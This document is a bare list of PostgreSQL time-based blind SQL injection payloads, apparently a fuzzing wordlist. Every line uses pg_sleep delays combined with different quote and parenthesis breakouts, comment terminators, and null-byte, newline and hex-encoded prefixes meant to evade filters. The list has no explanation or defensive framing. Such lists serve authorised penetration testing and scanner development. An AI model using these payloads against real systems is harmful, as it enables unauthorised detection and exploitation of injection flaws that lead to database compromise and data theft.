;SELECT pg_sleep(10);
;SELECT pg_sleep(10);
SELECT pg_sleep(10);
1 SELECT pg_sleep(10);
or SELECT pg_sleep(10);
(SELECT pg_sleep(10))
pg_sleep(10)--
1 or pg_sleep(10)--
" or pg_sleep(10)--
' or pg_sleep(10)--
1) or pg_sleep(10)--
") or pg_sleep(10)--
') or pg_sleep(10)--
1)) or pg_sleep(10)--
")) or pg_sleep(10)--
')) or pg_sleep(10)--
pg_SLEEP(10)
pg_SLEEP(10)--
pg_SLEEP(10)#
or pg_SLEEP(10)
or pg_SLEEP(10)--
or pg_SLEEP(10)#
' SELECT pg_sleep(10);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(10))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(10)) AND (1337=1337
or pg_sleep(10)--
) or pg_sleep(10)--
)) or pg_sleep(10)--
 and 1337=(select 1337 from pg_sleep(120))
 and 1337=(select 1337 from pg_sleep(120)) -- 
 or 1337=(select 1337 from pg_sleep(120))
 or 1337=(select 1337 from pg_sleep(120)) -- 
%00 and 1337=(select 1337 from pg_sleep(120))
%00 and 1337=(select 1337 from pg_sleep(120)) -- 
%00 or 1337=(select 1337 from pg_sleep(120))
%00 or 1337=(select 1337 from pg_sleep(120)) -- 
%00' and 1337=(select 1337 from pg_sleep(120)) -- 
%00' or 1337=(select 1337 from pg_sleep(120)) -- 
%00';select pg_sleep(120) -- 
%00;select pg_sleep(120)
%00;select pg_sleep(120) -- 
%00\' and 1337=(select 1337 from pg_sleep(120)) -- 
%00\' or 1337=(select 1337 from pg_sleep(120)) -- 
%00\';select pg_sleep(120) -- 
%00\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%00\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%00\\';select pg_sleep(120) -- 
%0a and 1337=(select 1337 from pg_sleep(120))
%0a and 1337=(select 1337 from pg_sleep(120)) -- 
%0a or 1337=(select 1337 from pg_sleep(120))
%0a or 1337=(select 1337 from pg_sleep(120)) -- 
%0a' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a';select pg_sleep(120) -- 
%0a;select pg_sleep(120)
%0a;select pg_sleep(120) -- 
%0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a\';select pg_sleep(120) -- 
%0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0a\\';select pg_sleep(120) -- 
%0d%0a and 1337=(select 1337 from pg_sleep(120))
%0d%0a and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a or 1337=(select 1337 from pg_sleep(120))
%0d%0a or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a';select pg_sleep(120) -- 
%0d%0a;select pg_sleep(120)
%0d%0a;select pg_sleep(120) -- 
%0d%0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\';select pg_sleep(120) -- 
%0d%0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
%0d%0a\\';select pg_sleep(120) -- 
' and 1337=(select 1337 from pg_sleep(120)) -- 
' or 1337=(select 1337 from pg_sleep(120)) -- 
';select pg_sleep(120) -- 
0x00 and 1337=(select 1337 from pg_sleep(120))
0x00 and 1337=(select 1337 from pg_sleep(120)) -- 
0x00 or 1337=(select 1337 from pg_sleep(120))
0x00 or 1337=(select 1337 from pg_sleep(120)) -- 
0x00' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00';select pg_sleep(120) -- 
0x00;select pg_sleep(120)
0x00;select pg_sleep(120) -- 
0x00\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00\';select pg_sleep(120) -- 
0x00\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x00\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x00\\';select pg_sleep(120) -- 
0x0a and 1337=(select 1337 from pg_sleep(120))
0x0a and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a or 1337=(select 1337 from pg_sleep(120))
0x0a or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a';select pg_sleep(120) -- 
0x0a;select pg_sleep(120)
0x0a;select pg_sleep(120) -- 
0x0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\';select pg_sleep(120) -- 
0x0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0a\\';select pg_sleep(120) -- 
0x0d0a and 1337=(select 1337 from pg_sleep(120))
0x0d0a and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a or 1337=(select 1337 from pg_sleep(120))
0x0d0a or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a';select pg_sleep(120) -- 
0x0d0a;select pg_sleep(120)
0x0d0a;select pg_sleep(120) -- 
0x0d0a\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\';select pg_sleep(120) -- 
0x0d0a\\' and 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\\' or 1337=(select 1337 from pg_sleep(120)) -- 
0x0d0a\\';select pg_sleep(120) -- 
;select pg_sleep(120)
;select pg_sleep(120) -- 
\' and 1337=(select 1337 from pg_sleep(120)) -- 
\' or 1337=(select 1337 from pg_sleep(120)) -- 
\';select pg_sleep(120) -- 
\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\';select pg_sleep(120) -- 
\\n and 1337=(select 1337 from pg_sleep(120))
\\n and 1337=(select 1337 from pg_sleep(120)) -- 
\\n or 1337=(select 1337 from pg_sleep(120))
\\n or 1337=(select 1337 from pg_sleep(120)) -- 
\\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\\n';select pg_sleep(120) -- 
\\n;select pg_sleep(120)
\\n;select pg_sleep(120) -- 
\\n\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\n\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\n\\';select pg_sleep(120) -- 
\\r\\n and 1337=(select 1337 from pg_sleep(120))
\\r\\n and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n or 1337=(select 1337 from pg_sleep(120))
\\r\\n or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n';select pg_sleep(120) -- 
\\r\\n;select pg_sleep(120)
\\r\\n;select pg_sleep(120) -- 
\\r\\n\\' and 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n\\' or 1337=(select 1337 from pg_sleep(120)) -- 
\\r\\n\\';select pg_sleep(120) -- 
\n and 1337=(select 1337 from pg_sleep(120))
\n and 1337=(select 1337 from pg_sleep(120)) -- 
\n or 1337=(select 1337 from pg_sleep(120))
\n or 1337=(select 1337 from pg_sleep(120)) -- 
\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\n';select pg_sleep(120) -- 
\n;select pg_sleep(120)
\n;select pg_sleep(120) -- 
\n\' and 1337=(select 1337 from pg_sleep(120)) -- 
\n\' or 1337=(select 1337 from pg_sleep(120)) -- 
\n\';select pg_sleep(120) -- 
\r\n and 1337=(select 1337 from pg_sleep(120))
\r\n and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n or 1337=(select 1337 from pg_sleep(120))
\r\n or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n' and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n' or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n';select pg_sleep(120) -- 
\r\n;select pg_sleep(120)
\r\n;select pg_sleep(120) -- 
\r\n\' and 1337=(select 1337 from pg_sleep(120)) -- 
\r\n\' or 1337=(select 1337 from pg_sleep(120)) -- 
\r\n\';select pg_sleep(120) -- 
